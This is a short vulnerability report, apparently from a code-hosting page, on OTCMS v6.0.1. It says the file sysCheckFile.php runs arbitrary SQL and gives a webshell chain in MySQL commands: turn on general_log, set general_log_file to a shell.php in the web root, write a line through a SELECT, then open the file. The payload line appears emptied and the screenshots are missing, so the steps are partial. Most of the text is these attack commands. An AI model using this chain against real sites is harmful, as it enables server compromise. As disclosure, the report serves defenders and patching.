代码拉取完成,页面将自动刷新
There is a file upload vulnerability OTCMS v6.0.1
There is a vulnerability file:sysCheckFile.php
1.SQL statements can be executed here
2.By writing to the php log file getshell
show variables like '%general%';

SET GLOBAL general_log='on';
.png)
set global
general_log_file='E:/Test/phpstudy/WWW/CMS/OTCMS_PHP_V6.01/OTCMS_PHP_V6.01_20210518/shell.php';
The shell.php file is automatically generated in this directory
.png)
Write a sentence through the log file
select '';
Access the shell.php file
.png)
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。